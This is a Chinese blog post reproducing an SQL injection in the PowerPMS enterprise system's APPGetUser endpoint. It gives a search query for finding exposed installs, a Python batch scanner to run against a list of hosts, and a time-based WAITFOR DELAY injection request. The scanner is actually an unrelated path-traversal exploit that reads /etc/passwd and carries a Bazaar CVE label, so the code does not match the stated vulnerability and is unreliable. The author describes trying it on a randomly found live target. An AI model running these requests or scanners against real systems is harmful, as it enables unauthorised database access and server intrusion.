【漏洞复现】普华-PowerPMS APPGetUser SQL注入漏洞

于 2024-08-09 00:30:00 发布
阅读量517 收藏 5
点赞数 19
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 网络安全 网络 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/141023944
版权

         声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

PowerPMS 是一款综合性的企业管理系统,它集成了财务管理、销售管理、采购管理、仓储管理以及项目管理等多个功能模块。该系统采用模块化设计,可以根据企业的具体需求进行灵活的配置和二次开发。PowerPMS 拥有用户友好的界面和流畅的操作流程,能够帮助企业高效地管理各种业务活动。此外,系统还支持多公司、多仓库、多币种等高级功能,能够满足不同规模企业的管理需求。其接口/APPAccount/APPGetUser?name=1存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:"PowerPMS用户登录"

2.使用poc批量扫描

import urllib.request
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re

# 禁用SSL证书验证,允许不安全的请求
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    # 读取文件中的URL列表
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    # 移除URL末尾的斜杠
    url = url.rstrip("/")
    # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd
    target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
    }
    try:
        # 发送GET请求
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件
        if status_code == 200 and 'root:' in content and 'var' in content:
            print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m")
            return True
    except Exception as e:
        print(e)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        # 如果提供了单个URL,直接检查
        check(url)
    elif txt:
        # 如果提供了包含多个URL的文件,逐个检查
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        # 如果没有提供任何参数,显示帮助信息
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:


GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析 

  1. 请求行(Request Line):

    • 方法:GET
    • URI:/APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--
    • HTTP版本:HTTP/1.1

  2. 请求头(Headers):

    • Host:x.x.x.x
    • User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
    • Connection:close
  • 请求行中的方法是GET,表示这是一个获取资源的请求。
  • URI中包含了一个SQL注入攻击的尝试,其中';WAITFOR DELAY '0:0:5'--是SQL注入的一部分,用于在数据库中执行延迟操作。这种攻击可能会导致服务器响应缓慢或拒绝服务。
  • 请求头中的Host指定了目标服务器的地址。
  • User-Agent提供了客户端浏览器的信息,包括操作系统、浏览器类型和版本等。
  • Connection设置为close,表示客户端希望在收到响应后立即关闭连接。

3.结束跑路

1.构造数据包,延时5S

2.构造数据包,延时3秒

每篇一言:风月折断杨柳枝,琴瑟朝露挥掷成诗。

Cityミ slaves
关注
  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
普华-PowerPMS APPGetUser SQL注入致RCE漏洞复现
0xSec
08-05 758
普华-PowerPMS APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
上海普华PowerPMS系统 APPGetUser接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-06 68
上海普华PowerPMS系统 APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。
1day 普华 PowerPMS 敏感信息泄露漏洞
weixin_43167326的博客
06-05 995
普华 PowerPMS 敏感信息泄露,未经身份验证的攻击者可利用此问题,获取服务器权限。
HW漏洞威胁情报第十三天|HW情报
weixin_43167326的博客
08-06 1375
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
普华基础软件-参考手册-ORIENTAIS Studio-安装指南
02-06
普华基础软件-ORIENTAIS Studio-安装指南】是针对普华基础软件公司的一款开发工具——ORIENTAIS Studio的详细安装手册。这款工具主要用于支持AUTOSAR(汽车开放系统架构)相关的软件开发工作。 1. **安装环境** ...
上海普华科技发展有限公司-P软件培训班-培训教程-多媒体课件(“项目”相关文档)共269张.pptx
11-14
* 支持关系型数据库 (Oracle, SQL Server, MSDE) * 易用性 * 简洁、直观的界面 * 向导提示 * 根据企业需要进行定制 通过P6软件的应用,可以提高项目的计划编制、监控、分析和控制能力,提高项目团队的沟通和协同...
p3软件学习手册-普华
04-10
《P3软件学习手册-普华》是一本深入解析P3项目管理软件的教程,针对的是普华3.0版本。这份手册分为两大部分,分别对应于两个压缩包文件:“01-第一章项目管理概述.rar”和“02-第二章网络技术应用.rar”。每个部分...
2022上海普华科技发展有限公司-P软件培训班-培训教程-多媒体课件精选ppt.ppt
11-14
普华P6专业培训跨越2022上海普华科技发展有限公司 本课程旨在介绍P6专业培训的基础知识和应用实践,帮助学员掌握P6软件的使用和管理。课程内容涵盖了P6软件的基础知识、项目初始化、项目进度、资源计划、项目执行...
中标普华7.0快速入门手册.pdf
10-30
中标普华7.0 快速入门的说明手册 文档格为:pdf的文档。
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 248
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 276
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 248
kubernetes集群部署sql server数据库服务
QSqlQueryModel与QSqlTableModel查询数据库
weixin_39688581的博客
08-08 84
项目中需要对数据进行查询与展示,数据量不大,使用的是sqlite数据库,将使用过程记录如下。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 478
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
大数据_SQL_5min访问达到100次的用户
最新发布
迎难而上
08-08 47
某公司网站每日访问量达到10亿级别的访问量,每次访问记录一条数据,数据包含如下字段:用户ID,访问时间(毫秒级),访问页面。要求使用hive求出所有在5分钟内访问次数达到100次的用户(求出用户ID即可)假设存在如下表table_a用户id (uid), 访问事件 (visit_time), 访问页面 (page)
SQL面试题练习 —— 奖金瓜分问题
hu_wei123的博客
08-08 423
现有奖金池为 10000元,代表奖金池中的初始额度。表中的数据代表每一个用户和其对应的得分,user_id 和 score 都不会有重复值。瓜分奖金的规则如下:按照 score 从高到低依次瓜分,每个人都能分走当前奖金池里面剩余奖金的一半,当奖金池里面剩余的奖金少于 250 时(不含),则停止瓜分奖金。现在需要查询出所有分到奖金的 user_id 和其对应的奖金。题目中要求:当奖金池里面剩余的奖金少于 250 时(不含),则停止瓜分奖金。如果无限瓜分下去,看下是什么结果。,排名 rn 的得到的为。
获取GORM执行时的sql字符串
dorlolo的博客
08-08 109
【代码】获取GORM执行时的sql字符串。
SQL】产品销售分析 I
Frost_Descent的博客
08-08 379
product_id 是关联到产品表 Product 的外键(reference 列)。(sale_id, year) 是销售表 Sales 的主键(具有唯一值的列的组合)。连接id和name :ON s.product_id = p.product_id。需要p.product_name , s.year , s.price。该表的每一行显示 product_id 在某一年的销售情况。product_id 是表的主键(具有唯一值的列)。该表的每一行表示每种产品的产品名称。编写解决方案,以获取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值